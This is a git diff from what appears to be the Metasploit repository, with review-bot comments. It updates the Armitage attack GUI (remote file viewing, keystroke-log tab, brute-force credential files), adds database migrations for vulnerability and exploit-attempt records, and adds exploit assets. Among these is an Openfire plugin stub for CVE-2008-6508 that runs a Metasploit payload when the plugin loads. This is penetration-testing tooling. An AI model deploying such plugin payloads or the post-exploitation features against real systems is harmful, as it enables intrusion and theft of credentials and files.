diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar
index fdba5f0401..330ad3bc4a 100755
Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ
diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt
index 355c6394a5..2e7548c4e9 100755
--- a/data/armitage/whatsnew.txt
+++ b/data/armitage/whatsnew.txt
@@ -1,6 +1,23 @@
Armitage Changelog
==================
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+ java -Darmitage.enable_nagle=true -jar armitage.jar
+
+ Use this if you see "bad mac" SSL errors when connected to a
+ team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+ forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+ let you quickly read several highlighted text files (it also
+ saves the files to the right place locally too)
+
7 Jun 12 - Adding on to those quick bug fixes / tweaks
--------
- Disabled Nagles algorithm for team server and client SSL sockets.
diff --git a/data/exploits/CVE-2008-6508/changelog.html b/data/exploits/CVE-2008-6508/changelog.html
new file mode 100755
index 0000000000..a7d5a78f98
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/changelog.html
@@ -0,0 +1,69 @@
+
+
+
+
+ Example plugin changelog
+
+
+
+
+
+Example plugin
+
+
+
Todo
+
+
+Add changelog content here
+
+
+
diff --git a/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar b/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar
new file mode 100755
index 0000000000..5c3b0bec46
Binary files /dev/null and b/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar differ
diff --git a/data/exploits/CVE-2008-6508/logo_large.gif b/data/exploits/CVE-2008-6508/logo_large.gif
new file mode 100755
index 0000000000..d1474a1a34
Binary files /dev/null and b/data/exploits/CVE-2008-6508/logo_large.gif differ
diff --git a/data/exploits/CVE-2008-6508/logo_small.gif b/data/exploits/CVE-2008-6508/logo_small.gif
new file mode 100755
index 0000000000..e1816427d7
Binary files /dev/null and b/data/exploits/CVE-2008-6508/logo_small.gif differ
diff --git a/data/exploits/CVE-2008-6508/plugin.xml b/data/exploits/CVE-2008-6508/plugin.xml
new file mode 100755
index 0000000000..7769df7049
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/plugin.xml
@@ -0,0 +1,10 @@
+
+
+ com.example.openfire.plugin.Example
+ PLUGINNAME
+ PLUGINDESCRIPTION
+ PLUGINAUTHOR
+ 1.0.0
+ 7/7/2008
+ 3.5.0
+
diff --git a/data/exploits/CVE-2008-6508/readme.html b/data/exploits/CVE-2008-6508/readme.html
new file mode 100755
index 0000000000..8d1da45937
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/readme.html
@@ -0,0 +1,69 @@
+
+
+
+
+ Example plugin readme
+
+
+
+
+
+Example plugin
+
+
+
Todo
+
+
+Add readme content here
+
+
+
diff --git a/data/exploits/CVE-2011-2110.swf b/data/exploits/CVE-2011-2110.swf
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0779.swf b/data/exploits/CVE-2012-0779.swf
new file mode 100755
index 0000000000..3242992888
Binary files /dev/null and b/data/exploits/CVE-2012-0779.swf differ
diff --git a/data/meterpreter/elevator.dll b/data/meterpreter/elevator.dll
index d1fc0eda40..8acf67d923 100755
Binary files a/data/meterpreter/elevator.dll and b/data/meterpreter/elevator.dll differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
index c7a3040159..d6612e25ac 100755
Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ
diff --git a/data/meterpreter/ext_server_espia.dll b/data/meterpreter/ext_server_espia.dll
index 49b1ea2ac9..fba2a00eea 100755
Binary files a/data/meterpreter/ext_server_espia.dll and b/data/meterpreter/ext_server_espia.dll differ
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
index 6b3cace75f..3fdbad4b4c 100755
Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ
diff --git a/data/meterpreter/ext_server_incognito.dll b/data/meterpreter/ext_server_incognito.dll
index 1b44f1770a..634c88a979 100755
Binary files a/data/meterpreter/ext_server_incognito.dll and b/data/meterpreter/ext_server_incognito.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
index 19a6117725..5745a9ad4b 100755
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.dll b/data/meterpreter/ext_server_lanattacks.dll
index 45ee6e5aec..d7e26692a0 100755
Binary files a/data/meterpreter/ext_server_lanattacks.dll and b/data/meterpreter/ext_server_lanattacks.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll
index 476b09b45e..518bf00d4f 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ
diff --git a/data/meterpreter/ext_server_priv.dll b/data/meterpreter/ext_server_priv.dll
index 820909c066..dbb669b0a1 100755
Binary files a/data/meterpreter/ext_server_priv.dll and b/data/meterpreter/ext_server_priv.dll differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
index 10f4f451bb..d0b13f89b9 100755
Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.dll b/data/meterpreter/ext_server_sniffer.dll
index 3c58f39e46..51d1815cd6 100755
Binary files a/data/meterpreter/ext_server_sniffer.dll and b/data/meterpreter/ext_server_sniffer.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.dll b/data/meterpreter/ext_server_stdapi.dll
index 1298749465..111e5f1113 100755
Binary files a/data/meterpreter/ext_server_stdapi.dll and b/data/meterpreter/ext_server_stdapi.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 3c17270b68..be3d0de353 100755
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ
diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll
index 01242186e4..915e74fcfa 100755
Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 47e4ee4e05..66008646dd 100755
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/screenshot.dll b/data/meterpreter/screenshot.dll
index 24c6f785e4..741f08cb2b 100755
Binary files a/data/meterpreter/screenshot.dll and b/data/meterpreter/screenshot.dll differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index 3058bcddf6..d868309c95 100755
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb
new file mode 100755
index 0000000000..0f946da39c
--- /dev/null
+++ b/data/sql/migrate/20120625000000_add_vuln_details.rb
@@ -0,0 +1,34 @@
+class AddVulnDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_details do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.float :cvss_score # 0.0 to 10.0
+ t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+ t.string :title # Short identifier
+ t.text :description # Plain text or HTML (trusted)
+ t.text :solution # Plain text or HTML (trusted)
+ t.binary :proof # Should be UTF-8, but may not be, sanitize on output
+ # Technically this duplicates vuln.info, but that field
+ # is poorly managed / handled today. Eventually we will
+ # replace vuln.info
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ t.string :nx_vuln_id # 'jre-java-update-flaw'
+ t.float :nx_severity # 0-10
+ t.float :nx_pci_severity # 0-10
+ t.timestamp :nx_published # Normalized from "20081205T000000000"
+ t.timestamp :nx_added # Normalized from "20081205T000000000"
+ t.timestamp :nx_modified # Normalized from "20081205T000000000"
+ t.text :nx_tags # Comma separated
+
+ end
+ end
+
+ def self.down
+ drop_table :vuln_details
+ end
+end
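Review bot: The comments on `description` and `solution` call their HTML trusted, but nothing in the table definition says where that trust is established. These columns look like they are filled from imported scanner reports, so any view that renders them raw would carry markup from the import file into the UI. I would reword both comments to something like `# Plain text or HTML; must be sanitized before rendering`, matching the "sanitize on output" rule already written for `proof`. Separately, `vuln_id` gets no index here, and the same holds for `host_id` in `host_details`, `vuln_id` in `vuln_attempts` and the reference columns in `exploit_attempts` later in this diff; `add_index :vuln_details, :vuln_id` would keep per-vuln lookups from scanning the table. The `cvss_vector` example string is also pasted twice in its comment.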
diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb
new file mode 100755
index 0000000000..36e70892fa
--- /dev/null
+++ b/data/sql/migrate/20120625000001_add_host_details.rb
@@ -0,0 +1,16 @@
+class AddHostDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :host_details do |t|
+ t.integer :host_id # Host table reference
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ end
+ end
+
+ def self.down
+ drop_table :host_details
+ end
+end
diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb
new file mode 100755
index 0000000000..bd240ecdc5
--- /dev/null
+++ b/data/sql/migrate/20120625000002_expand_details.rb
@@ -0,0 +1,16 @@
+class ExpandDetails < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_details, :nx_vuln_status, :text
+ add_column :vuln_details, :nx_proof_key, :text
+ add_column :vuln_details, :src, :string
+ add_column :host_details, :src, :string
+ end
+
+ def self.down
+ remove_column :vuln_details, :nx_vuln_status
+ remove_column :vuln_details, :nx_proof_key
+ remove_column :vuln_details, :src
+ remove_column :host_details, :src
+ end
+end
diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb
new file mode 100755
index 0000000000..4122503692
--- /dev/null
+++ b/data/sql/migrate/20120625000003_expand_details2.rb
@@ -0,0 +1,24 @@
+class ExpandDetails2 < ActiveRecord::Migration
+
+ def self.up
+ add_column :host_details, :nx_site_name, :string
+ add_column :host_details, :nx_site_importance, :string
+ add_column :host_details, :nx_scan_template, :string
+ add_column :host_details, :nx_risk_score, :float
+
+ add_column :vuln_details, :nx_scan_id, :integer
+ add_column :vuln_details, :nx_vulnerable_since, :timestamp
+ add_column :vuln_details, :nx_pci_compliance_status, :string
+ end
+
+ def self.down
+ remove_column :host_details, :nx_site_name
+ remove_column :host_details, :nx_site_importance
+ remove_column :host_details, :nx_scan_template
+ remove_column :host_details, :nx_risk_score
+
+ remove_column :vuln_details, :nx_scan_id
+ remove_column :vuln_details, :nx_vulnerable_since
+ remove_column :vuln_details, :nx_pci_compliance_status
+ end
+end
diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb
new file mode 100755
index 0000000000..b943fe358f
--- /dev/null
+++ b/data/sql/migrate/20120625000004_add_vuln_attempts.rb
@@ -0,0 +1,19 @@
+class AddVulnAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_attempts do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ end
+ end
+
+ def self.down
+ drop_table :vuln_attempts
+ end
+end
diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
new file mode 100755
index 0000000000..c34101fd89
--- /dev/null
+++ b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
@@ -0,0 +1,14 @@
+class AddVulnAndHostCounterCaches < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :host_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ remove_column :hosts, :host_detail_count
+ remove_column :vulns, :vuln_detail_count
+ remove_column :vulns, :vuln_attempt_count
+ end
+end
diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb
new file mode 100755
index 0000000000..cb99f7ee84
--- /dev/null
+++ b/data/sql/migrate/20120625000006_add_module_details.rb
@@ -0,0 +1,118 @@
+class AddModuleDetails < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :module_details do |t|
+ t.timestamp :mtime # disk modified time
+ t.text :file # location on disk
+ t.string :mtype # exploit, auxiliary, post, etc
+ t.text :refname # module path (no type)
+ t.text :fullname # module path with type
+ t.text :name # module title
+ t.integer :rank # exploit rank
+ t.text :description #
+ t.string :license # MSF_LICENSE
+ t.boolean :privileged # true or false
+ t.timestamp :disclosure_date # Mar 10 2004
+ t.integer :default_target # 0
+ t.text :default_action # "scan"
+ t.string :stance # "passive"
+ t.boolean :ready # true/false
+ end
+
+ add_index :module_details, :refname
+ add_index :module_details, :name
+ add_index :module_details, :description
+ add_index :module_details, :mtype
+
+ create_table :module_authors do |t|
+ t.integer :module_detail_id
+ t.text :name
+ t.text :email
+ end
+ add_index :module_authors, :module_detail_id
+
+ create_table :module_mixins do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_mixins, :module_detail_id
+
+ create_table :module_targets do |t|
+ t.integer :module_detail_id
+ t.integer :index
+ t.text :name
+ end
+ add_index :module_targets, :module_detail_id
+
+ create_table :module_actions do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_actions, :module_detail_id
+
+ create_table :module_refs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_refs, :module_detail_id
+ add_index :module_refs, :name
+
+ create_table :module_archs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_archs, :module_detail_id
+
+ create_table :module_platforms do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_platforms, :module_detail_id
+
+ end
+
+ def self.down
+ remove_index :module_details, :refname
+ remove_index :module_details, :name
+ remove_index :module_details, :description
+ remove_index :module_details, :mtype
+
+ remove_index :module_authors, :module_detail_id
+ remove_index :module_mixins, :module_detail_id
+ remove_index :module_targets, :module_detail_id
+ remove_index :module_actions, :module_detail_id
+ remove_index :module_refs, :module_detail_id
+ remove_index :module_refs, :name
+ remove_index :module_archs, :module_detail_id
+ remove_index :module_platform, :module_detail_id
+
+ drop_table :module_details
+ drop_table :module_authors
+ drop_table :module_mixins
+ drop_table :module_targets
+ drop_table :module_actions
+ drop_table :module_refs
+ drop_table :module_archs
+ drop_table :module_platforms
+
+ end
+end
+
+=begin
+
+Mdm::Host.find_by_sql("
+SELECT
+ hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref
+FROM
+ hosts,vulns,vulns_refs,refs,module_refs,module_details
+WHERE
+ hosts.id = vulns.host_id AND
+ vulns.id = vulns_refs.vuln_id AND
+ vulns_refs.ref_id = refs.id AND
+ refs.name = module_refs.name AND
+ module_refs.module_detail_id = modules_details.id
+").map{|x| [x.address, x.mname, x.vname, x.vref ] }
+
+
+=end
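Review bot: `self.down` cannot complete as written, because `remove_index :module_platform, :module_detail_id` names a table that `self.up` never creates (it creates `module_platforms`), so a rollback would raise at that line. It should read `remove_index :module_platforms, :module_detail_id`. `add_index :module_details, :description` puts a plain index on a free-text column; on PostgreSQL a long enough description can exceed the index row size limit and make the insert fail, so I would drop that index unless it is known to be needed. The example query in the trailing `=begin` block also joins on `modules_details.id` where the table is `module_details`.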
diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb
new file mode 100755
index 0000000000..22d3ec0b1f
--- /dev/null
+++ b/data/sql/migrate/20120625000007_add_exploit_attempts.rb
@@ -0,0 +1,26 @@
+class AddExploitAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :exploit_attempts do |t|
+ t.integer :host_id # Host table reference (primary)
+ t.integer :service_id # Service table reference (optional)
+ t.integer :vuln_id # Vuln table reference (optional)
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ t.integer :port # Port -> Services are created/destroyed frequently and failed
+ t.string :proto # Protocol | attempts may be against closed ports.
+ end
+
+ add_column :hosts, :exploit_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ drop_table :exploit_attempts
+ remove_column :hosts, :exploit_attempt_count
+ end
+end
diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb
new file mode 100755
index 0000000000..7d6dd0f96b
--- /dev/null
+++ b/data/sql/migrate/20120625000008_add_fail_message.rb
@@ -0,0 +1,12 @@
+class AddFailMessage < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_attempts, :fail_detail, :text
+ add_column :exploit_attempts, :fail_detail, :text
+ end
+
+ def self.down
+ remove_column :vuln_attempts, :fail_detail
+ remove_column :exploit_attempts, :fail_detail
+ end
+end
diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html
index 575effc437..f4119fca2b 100644
--- a/external/source/armitage/resources/about.html
+++ b/external/source/armitage/resources/about.html
@@ -3,7 +3,7 @@
Armitage 1.44-dev
An attack management tool for Metasploit®
- Release: 7 Jun 12
+ Release: 24 Jun 12
Developed by:
diff --git a/external/source/armitage/scripts/browser.sl b/external/source/armitage/scripts/browser.sl
index ab60e0f824..0f7655fe36 100644
--- a/external/source/armitage/scripts/browser.sl
+++ b/external/source/armitage/scripts/browser.sl
@@ -306,6 +306,44 @@ sub convertDate {
}
};
+sub openFileViewer {
+ local('$dialog $display');
+ $dialog = [new JPanel];
+ [$dialog setLayout: [new BorderLayout]];
+ $display = [new console.Display: $preferences];
+ [$dialog add: $display, [BorderLayout CENTER]];
+ [$frame addTab: "View", $dialog, $null, $null];
+ return $display;
+}
+
+%handlers["cat"] = {
+ this('$file @files');
+ if ($0 eq "begin") {
+ $file = shift(@files);
+ local('$host $handle');
+
+ # show the file
+ $host = sessionToHost($1);
+ [$display append: "
+\c9#
+\c9# $host $+ : $file
+\c9#\n"];
+ if ($2 !ismatch '\p{ASCII}*') {
+ [$display append: "\c4This is a binary file\n"];
+ # don't save binary files as the cat command doesn't preserve them
+ }
+ else {
+ [$display append: $2];
+
+ # save the file
+ mkdir(getFileProper(dataDirectory(), "downloads", $host, $path));
+ $handle = openf(">" . getFileProper(dataDirectory(), "downloads", $host, $path, $file));
+ writeb($handle, $2);
+ closef($handle);
+ }
+ }
+};
+
sub buildFileBrowserMenu {
# ($popup, [$model getSelectedValue: $table], @rows);
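Review bot: The save branch builds a local path from `$host`, `$path` and `$file` and hands it to `mkdir` and `openf` without checking that the result stays under the downloads directory. `$path` and `$file` appear to come from the remote session's directory listing, so a name with parent-directory segments could land the file elsewhere on the operator's machine. Resolving the path and comparing it against `getFileProper(dataDirectory(), "downloads")` before writing, and skipping the save when it falls outside, would close that. The handle returned by `openf` is also written to without an error check, so a failed open passes silently. `$display` and `$path` are not declared in this handler; they are injected by the View menu item in the next hunk, which deserves a one-line comment here.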
@@ -316,10 +354,25 @@ sub buildFileBrowserMenu {
# need to pass current working directory, selected file, and type
setupMenu($1, "file_browser", @($2, %types, [$text getText]));
+ item($1, "View", 'V', lambda({
+ local('$f $dir @temp $tdir');
+
+ @temp = split('\\\\', [$text getText]);
+ $dir = join("/", @temp);
+ %handlers['cat']['$path'] = $dir;
+ %handlers['cat']['@files'] = @();
+ %handlers['cat']['$display'] = openFileViewer();
+
+ [$setcwd];
+ foreach $f ($file) {
+ push(%handlers['cat']['@files'], $f);
+ m_cmd($sid, "cat \" $+ $f $+ \"");
+ }
+ }, $file => $2, \$sid, \%types, \$setcwd, \$text));
+
item($1, "Download", 'D', lambda({
local('$f $dir @temp $tdir');
@temp = split('\\\\', [$text getText]);
-
$dir = strrep(downloadDirectory(sessionToHost($sid), join("/", @temp)), "\\", "/");
foreach $f ($file) {
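Review bot: The View item stores `$path`, `@files` and `$display` on the single shared `%handlers['cat']` closure, so starting a second View before the first has finished replaces the file queue and the output tab for replies still in flight. File contents can then be labelled, and saved, under the wrong name; keeping this state per session (keyed by `$sid`) would avoid that. The command is built as `"cat \" $+ $f $+ \""`, which breaks for a file name that itself contains a double quote. `$tdir` is declared in `local(...)` but not used in the new lambda. The enclosing `buildFileBrowserMenu` continues past this hunk.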
diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl
index 1e7110d60b..e31a50dda8 100644
--- a/external/source/armitage/scripts/jobs.sl
+++ b/external/source/armitage/scripts/jobs.sl
@@ -90,24 +90,11 @@ sub manage_job {
[$startf];
}
else {
- local('$job $confirm $foo');
+ local('$job $confirm $foo $confirm');
$job = call($client, "job.info", $1);
-
- $foo = lambda({
- local('$confirm');
- $confirm = askYesNo([$stopf : $jid, $job], "Stop Job");
- if ($confirm eq "0") {
- cmd_safe("jobs -k $jid", {
- if ($3 ne "") { showError($3); }
- });
- }
- }, \$stopf, \$job, $jid => $1);
-
- if ([SwingUtilities isEventDispatchThread]) {
- [$foo];
- }
- else {
- [SwingUtilities invokeLater: $foo];
+ $confirm = askYesNo([$stopf : $1, $job], "Stop Job");
+ if ($confirm eq "0") {
+ call_async($client, "job.stop", $1);
}
}
}, \$startf, \$stopf));
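Review bot: The `local(...)` line now lists `$confirm` twice and still declares `$foo`, which the rewritten branch no longer uses; `local('$job $confirm');` is enough. The removed code reported a failed stop through `showError($3)`, whereas `call_async($client, "job.stop", $1)` discards the result, so a job that fails to stop gives the user no feedback. The old code also made sure the confirmation ran on the Swing event dispatch thread; if this callback can run off that thread, `askYesNo` is now called from the wrong one, which is worth confirming. The enclosing `manage_job` starts before this hunk.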
diff --git a/external/source/armitage/scripts/meterpreter.sl b/external/source/armitage/scripts/meterpreter.sl
index 2e91ff4267..531fb584b4 100644
--- a/external/source/armitage/scripts/meterpreter.sl
+++ b/external/source/armitage/scripts/meterpreter.sl
@@ -257,7 +257,7 @@ sub showMeterpreterMenu {
separator($1);
- item($1, "Kill", 'K', lambda({ cmd_safe("sessions -k $sid"); }, $sid => "$sid"));
+ item($1, "Kill", 'K', lambda({ call_async($client, "session.stop", $sid); }, $sid => "$sid"));
}
sub launch_msf_scans {
diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl
index 69afbf1d01..548e74c6b5 100644
--- a/external/source/armitage/scripts/passhash.sl
+++ b/external/source/armitage/scripts/passhash.sl
@@ -291,8 +291,10 @@ sub show_login_dialog {
}
sub createUserPassFile {
- local('$handle $user $pass $type $row $2');
- $handle = openf(">userpass.txt");
+ local('$handle $user $pass $type $row $2 $name');
+ $name = "userpass" . rand(10000) . ".txt";
+
+ $handle = openf("> $+ $name");
foreach $row ($1) {
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
if ($type eq "password" || $type eq $2) {
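Review bot: `"userpass" . rand(10000) . ".txt"` allows only 10,000 names in the working directory, so two concurrent brute-force runs can still pick the same file and overwrite each other's list. The name is also guessable for a file that holds plaintext credentials. Creating the file through the JVM's temp-file facility (`java.io.File.createTempFile`, which picks a unique name and creates the file in one step) and passing the resulting path to `openf` would remove both problems. The body of `createUserPassFile` continues in the next hunk.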
@@ -306,12 +308,12 @@ sub createUserPassFile {
if ($client !is $mclient) {
local('$file');
- $file = uploadFile("userpass.txt");
- deleteOnExit("userpass.txt");
+ $file = uploadFile($name);
+ deleteOnExit($name);
return $file;
}
else {
- return getFileProper("userpass.txt");
+ return getFileProper($name);
}
}
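Review bot: Only the upload branch schedules cleanup; the `else` branch returns `getFileProper($name)` without `deleteOnExit($name)`. With a fresh name per run, each local brute force now leaves another plaintext credential file behind, where the old fixed `userpass.txt` was at least overwritten. Calling `deleteOnExit($name);` once before the `if` would cover both branches. Even then the files persist until the client exits, so removing the file when the module finishes would be tighter.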
diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl
index 39184af74e..d2758871f0 100644
--- a/external/source/armitage/scripts/util.sl
+++ b/external/source/armitage/scripts/util.sl
@@ -94,7 +94,12 @@ sub setupEventStyle {
sub createDisplayTab {
local('$console $host $queue $file');
$queue = [new ConsoleQueue: $client];
- $console = [new Console: $preferences];
+ if ($1 eq "Log Keystrokes") {
+ $console = [new ActivityConsole: $preferences];
+ }
+ else {
+ $console = [new Console: $preferences];
+ }
setupConsoleStyle($console);
[$queue setDisplay: $console];
[new QueueTabCompletion: $console, $queue];
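Review bot: Choosing the console class by comparing the tab title, `$1 eq "Log Keystrokes"`, ties behaviour to a display string, so renaming the tab would silently drop the activity colouring. A comment such as `# ActivityConsole recolours the tab on new output; keyed on the keystroke logger's tab title` would at least record the coupling, and an explicit argument to `createDisplayTab` would remove it. The function body continues past this hunk.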
diff --git a/external/source/armitage/src/ssl/SecureSocket.java b/external/source/armitage/src/ssl/SecureSocket.java
index 12230d4013..b13c25fc9f 100644
--- a/external/source/armitage/src/ssl/SecureSocket.java
+++ b/external/source/armitage/src/ssl/SecureSocket.java
@@ -22,7 +22,12 @@ public class SecureSocket {
SSLSocketFactory factory = (SSLSocketFactory) sslcontext.getSocketFactory();
socket = (SSLSocket)factory.createSocket(host, port);
- socket.setTcpNoDelay(true);
+
+ /* give users a means to disable TCP_NO_DELAY. I experienced a bad_mac SSL error
+ on another network when this option was enabled. *shrug* */
+ if (!"true".equals(System.getProperty("armitage.enable_nagle"))) {
+ socket.setTcpNoDelay(true);
+ }
socket.setSoTimeout(4048);
socket.startHandshake();
}
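Review bot: A `bad_mac` alert means a TLS record failed its integrity check, which the Nagle setting should not be able to cause by itself, so the new switch hides the symptom rather than the fault. The comment should say that the root cause is unknown and name what to check (for example concurrent writers on the same `SSLSocket`, or a middlebox altering traffic) instead of ending in `*shrug*`. The socket option is called `TCP_NODELAY`, not `TCP_NO_DELAY` as the comment has it. The property test can be written as `if (!Boolean.getBoolean("armitage.enable_nagle"))`. The enclosing constructor starts before this hunk.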
diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt
index 355c6394a5..2e7548c4e9 100644
--- a/external/source/armitage/whatsnew.txt
+++ b/external/source/armitage/whatsnew.txt
@@ -1,6 +1,23 @@
Armitage Changelog
==================
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+ java -Darmitage.enable_nagle=true -jar armitage.jar
+
+ Use this if you see "bad mac" SSL errors when connected to a
+ team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+ forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+ let you quickly read several highlighted text files (it also
+ saves the files to the right place locally too)
+
7 Jun 12 - Adding on to those quick bug fixes / tweaks
--------
- Disabled Nagles algorithm for team server and client SSL sockets.
diff --git a/external/source/exploits/CVE-2008-6508/Example.java b/external/source/exploits/CVE-2008-6508/Example.java
new file mode 100644
index 0000000000..3c4717b4e1
--- /dev/null
+++ b/external/source/exploits/CVE-2008-6508/Example.java
@@ -0,0 +1,31 @@
+package com.example.openfire.plugin;
+
+import java.io.*;
+import java.util.TimerTask;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.openfire.container.Plugin;
+import org.jivesoftware.openfire.container.PluginManager;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.util.Log;
+import org.jivesoftware.util.TaskEngine;
+import metasploit.*;
+
+public class Example implements Plugin {
+
+ public void initializePlugin(PluginManager manager, File pluginDirectory) {
+ try{
+ Payload.main(null);
+ }
+ catch (Exception ex)
+ {
+ Log.error("error", ex);
+ }
+
+ }
+
+ public void destroyPlugin() {
+
+ }
+}
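Review bot: `org.jivesoftware.util.JiveGlobals` is imported twice, and `TimerTask`, `JiveGlobals` and `TaskEngine` are imported but never used in the class. Only `File`, `Plugin`, `PluginManager`, `Log` and the `metasploit` package are needed. The class also has no header comment; one line such as `/* Plugin stub packaged into plugin-metasploit.jar for the CVE-2008-6508 module */` would tell a reader of the tree why a class named `Example` lives here. The empty `destroyPlugin()` could carry a `// nothing to release` comment so it does not read as unfinished.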
diff --git a/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as b/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as
new file mode 100644
index 0000000000..595b7786ea
--- /dev/null
